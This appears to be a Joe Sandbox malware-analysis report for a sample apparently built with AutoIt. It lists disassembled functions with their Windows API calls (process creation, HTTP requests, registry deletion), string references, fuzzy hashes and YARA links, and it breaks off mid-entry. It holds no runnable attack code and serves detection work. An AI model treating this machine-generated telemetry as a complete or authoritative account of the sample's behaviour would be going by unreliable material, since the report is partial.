Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: c839f0bb1ceb01a20da926b485da7825d8200044d895a29658bcc31a9526c1ac
Instruction ID: 8dbea50abb69914d29e20ed40b8853977e1cc17df4de729d1b759e88f74a9a81
Opcode Fuzzy Hash: c839f0bb1ceb01a20da926b485da7825d8200044d895a29658bcc31a9526c1ac
Instruction Fuzzy Hash: 5E81E071A04605BBDB20BF61DD42FBF3BA8AF16300F144068F905AB1E2EB74DA51D7A1

Function 00B05A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00B05A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B05A40
SetWindowTextW.USER32(?,?), ref: 00B05A57
GetDlgItem.USER32(?,000003EA), ref: 00B05A6C
SetWindowTextW.USER32(00000000,?), ref: 00B05A72
GetDlgItem.USER32(?,000003E9), ref: 00B05A82
SetWindowTextW.USER32(00000000,?), ref: 00B05A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B05AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B05AC3
GetWindowRect.USER32(?,?), ref: 00B05ACC
_wcslen.LIBCMT ref: 00B05B33
SetWindowTextW.USER32(?,?), ref: 00B05B6F
GetDesktopWindow.USER32 ref: 00B05B75
GetWindowRect.USER32(00000000), ref: 00B05B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B05BD3
GetClientRect.USER32(?,?), ref: 00B05BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00B05C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B05C2F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
Instruction ID: 55e0f34dcd3ec3d68e8cb1b7528f755a139f81548483d271a8adf626d2bec9e2
Opcode Fuzzy Hash: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
Instruction Fuzzy Hash: 1A712B31A00A09AFDB20DFA8CE85AAFBFF5FB48704F104558E546A39A0DB75A944CF50

Function 00AC00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AC00C6

Part of subcall function 00AC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B7070C,00000FA0,E3ACFBB1,?,?,?,?,00AE23B3,000000FF), ref: 00AC011C
Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0127
Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0138
Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AC014E
Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AC015C
Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AC016A
Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC0195
Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC01A0

___scrt_fastfail.LIBCMT ref: 00AC00E7

Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9

Strings

SleepConditionVariableCS, xrefs: 00AC0154
InitializeConditionVariable, xrefs: 00AC0148
kernel32.dll, xrefs: 00AC0133
WakeAllConditionVariable, xrefs: 00AC0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AC0122

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
Instruction ID: 3880327048e2ebea9f22216e6ad0ffcf3baa7dba3986164c54bb48260e8a4762
Opcode Fuzzy Hash: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
Instruction Fuzzy Hash: DC21A732A44711EBD7116BA4AD09F7E77E8EB05B51F26063EF815B72A1DFB49C008B90

Function 00B030F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B0318D
_wcslen.LIBCMT ref: 00B031F8

Strings

NAME, xrefs: 00B03335, 00B03346
CLASS, xrefs: 00B03188, 00B031A5
INSTANCE, xrefs: 00B03453
CLASSNN, xrefs: 00B031F3, 00B03204
TEXT, xrefs: 00B0347C
REGEXPCLASS, xrefs: 00B03255, 00B03266

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
Instruction ID: ed097928b575314d7df5907ebfa460d98f3720301f5d6b45491e59897201bcae
Opcode Fuzzy Hash: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
Instruction Fuzzy Hash: DBE1F532A005169BCB24DF64C899BEEBFF8FF54B10F548199E456B72D0DB30AE858790

Function 00B144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00B3CC08), ref: 00B14527
_wcslen.LIBCMT ref: 00B1453B
_wcslen.LIBCMT ref: 00B14599
_wcslen.LIBCMT ref: 00B145F4
_wcslen.LIBCMT ref: 00B1463F
_wcslen.LIBCMT ref: 00B146A7

Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD

GetDriveTypeW.KERNEL32(?,00B66BF0,00000061), ref: 00B14743

Strings

network, xrefs: 00B1469D, 00B146A2
removable, xrefs: 00B145EA, 00B145EF
cdrom, xrefs: 00B1458F, 00B14594
unknown, xrefs: 00B14708
all, xrefs: 00B14531, 00B14536
ramdisk, xrefs: 00B146F1
fixed, xrefs: 00B14635, 00B1463A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
Instruction ID: d89c382d928050e8b52ef93eb7a63cc2c8ef6a6611395bba3f80d18af6e703e6
Opcode Fuzzy Hash: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
Instruction Fuzzy Hash: 31B1F1316083029FC710DF28C991AAEB7E5EFA6764F94499DF496C7291D730DC84CBA2

Function 00B2AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B2B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1D4
_wcslen.LIBCMT ref: 00B2B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B236
_wcslen.LIBCMT ref: 00B2B332

Part of subcall function 00B105A7: GetStdHandle.KERNEL32(000000F6), ref: 00B105C6

_wcslen.LIBCMT ref: 00B2B34B
_wcslen.LIBCMT ref: 00B2B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B2B3B6
GetLastError.KERNEL32(00000000), ref: 00B2B407
CloseHandle.KERNEL32(?), ref: 00B2B439
CloseHandle.KERNEL32(00000000), ref: 00B2B44A
CloseHandle.KERNEL32(00000000), ref: 00B2B45C
CloseHandle.KERNEL32(00000000), ref: 00B2B46E
CloseHandle.KERNEL32(?), ref: 00B2B4E3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: f0fcb80eec50325fb143484c590b1fccbfb025c28266ab174ed6d3784d7bc82d
Instruction ID: 7bb0d90baac72f899d86f1c56d07e021cd3dc3e932dbd2bc492e1bceb44c5645
Opcode Fuzzy Hash: f0fcb80eec50325fb143484c590b1fccbfb025c28266ab174ed6d3784d7bc82d
Instruction Fuzzy Hash: 46F169315043109FCB15EF24D991B6EBBE5EF85314F18899DF8999B2A2DB31EC40CB52

Function 00AA326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00B71990), ref: 00AE2F8D
GetMenuItemCount.USER32(00B71990), ref: 00AE303D
GetCursorPos.USER32(?), ref: 00AE3081
SetForegroundWindow.USER32(00000000), ref: 00AE308A
TrackPopupMenuEx.USER32(00B71990,00000000,?,00000000,00000000,00000000), ref: 00AE309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AE30A9

Strings

0, xrefs: 00AA327D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
Instruction ID: d874314966aa69529ed1ed9fde3d7ee3c27e2e8a13a025e3f45928f66591bd03
Opcode Fuzzy Hash: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
Instruction Fuzzy Hash: 73710631640255BEEB259F69CC49FAABF78FF05324F204216F5156B1E0CBB1AD64CB90

Function 00B36CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00B36DEB

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B36E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B36E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36E94
DestroyWindow.USER32(?), ref: 00B36EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B36EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36EFD
GetDesktopWindow.USER32 ref: 00B36F16
GetWindowRect.USER32(00000000), ref: 00B36F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B36F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B36F4D

Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952

Strings

tooltips_class32, xrefs: 00B36E58, 00B36EDD
0, xrefs: 00B36D98

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
Instruction ID: 23d329f0bf3936f2e9353836023f19859ba634ebdf3f3ed0c3463d5e82146b74
Opcode Fuzzy Hash: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
Instruction Fuzzy Hash: C1716974144244AFDB21CF18DC44FAABBE9FB89304F24485DFA9997261CB70A94ACB21

Function 00B3911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

DragQueryPoint.SHELL32(?,?), ref: 00B39147

Part of subcall function 00B37674: ClientToScreen.USER32(?,?), ref: 00B3769A
Part of subcall function 00B37674: GetWindowRect.USER32(?,?), ref: 00B37710
Part of subcall function 00B37674: PtInRect.USER32(?,?,00B38B89), ref: 00B37720

SendMessageW.USER32(?,000000B0,?,?), ref: 00B391B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B391BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B391DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B39225
SendMessageW.USER32(?,000000B0,?,?), ref: 00B3923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00B39255
SendMessageW.USER32(?,000000B1,?,?), ref: 00B39277
DragFinish.SHELL32(?), ref: 00B3927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B39371

Strings

@GUI_DRAGID, xrefs: 00B392E9
@GUI_DROPID, xrefs: 00B3929E
@GUI_DRAGFILE, xrefs: 00B39320

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
Instruction ID: 3cc201f291b4bc4e08255ece6cac06a3900c96fdf1379a679e24b4e154aae94b
Opcode Fuzzy Hash: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
Instruction Fuzzy Hash: 77618B71108301AFD701EFA4CD85DAFBBE8EF89750F10495DF595932A0DB709A49CB62

Function 00B1C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B1C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B1C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C5F0
InternetCloseHandle.WININET(00000000), ref: 00B1C5FB

Strings

, xrefs: 00B1C575

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
Instruction ID: bb39406c25a659e4cb6109f8dd77e7a99d9ef54157da8f8eb21655ff052abddd
Opcode Fuzzy Hash: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
Instruction Fuzzy Hash: 775139B1540208BFEB218FA4C989ABB7FFDFB18754F504459F945E7210DB34EA889B60

Function 00B3856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00B38592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385BA
GlobalLock.KERNEL32(00000000), ref: 00B385C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385D7
GlobalUnlock.KERNEL32(00000000), ref: 00B385E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00B3FC38,?), ref: 00B38611
GlobalFree.KERNEL32(00000000), ref: 00B38621
GetObjectW.GDI32(?,00000018,?), ref: 00B38641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00B38671
DeleteObject.GDI32(?), ref: 00B38699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B386AF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
Instruction ID: ff2bc5ff9811b92a73743e9ace7b5cd381af7941c91748e0732ce856c9241158
Opcode Fuzzy Hash: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
Instruction Fuzzy Hash: A241F975600204BFDB119FA9DC89EAF7BB8FF89711F208059F905E7260DB30A901DB61

Function 00B114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00B11502
VariantCopy.OLEAUT32(?,?), ref: 00B1150B
VariantClear.OLEAUT32(?), ref: 00B11517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B115FB
VarR8FromDec.OLEAUT32(?,?), ref: 00B11657
VariantInit.OLEAUT32(?), ref: 00B11708
SysFreeString.OLEAUT32(?), ref: 00B1178C
VariantClear.OLEAUT32(?), ref: 00B117D8
VariantClear.OLEAUT32(?), ref: 00B117E7
VariantInit.OLEAUT32(00000000), ref: 00B11823

Strings

Default, xrefs: 00B116AF
%4d%02d%02d%02d%02d%02d, xrefs: 00B11625

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 7b1bc4be0d7d08249b00b83da3809c918c68608442f657229b8493c959cd282f
Instruction ID: 8c5ad28c79aa720c9b8e5e8031159b9e8b970bbc4ddd5b05b5e3f2ef64570fc9
Opcode Fuzzy Hash: 7b1bc4be0d7d08249b00b83da3809c918c68608442f657229b8493c959cd282f
Instruction Fuzzy Hash: 48D10071A00115DFDB009F69D884BBDB7F6FF45700FA48996E646AB281DB30DD80DB62

Function 00B2B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2B772
RegDeleteValueW.ADVAPI32(?,?), ref: 00B2B80A
RegCloseKey.ADVAPI32(?), ref: 00B2B87E
RegCloseKey.ADVAPI32(?), ref: 00B2B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B2B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2B922
FreeLibrary.KERNEL32(00000000), ref: 00B2B983
RegCloseKey.ADVAPI32(00000000), ref: 00B2B994

Strings

RegDeleteKeyExW, xrefs: 00B2B8FE
advapi32.dll, xrefs: 00B2B8ED

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
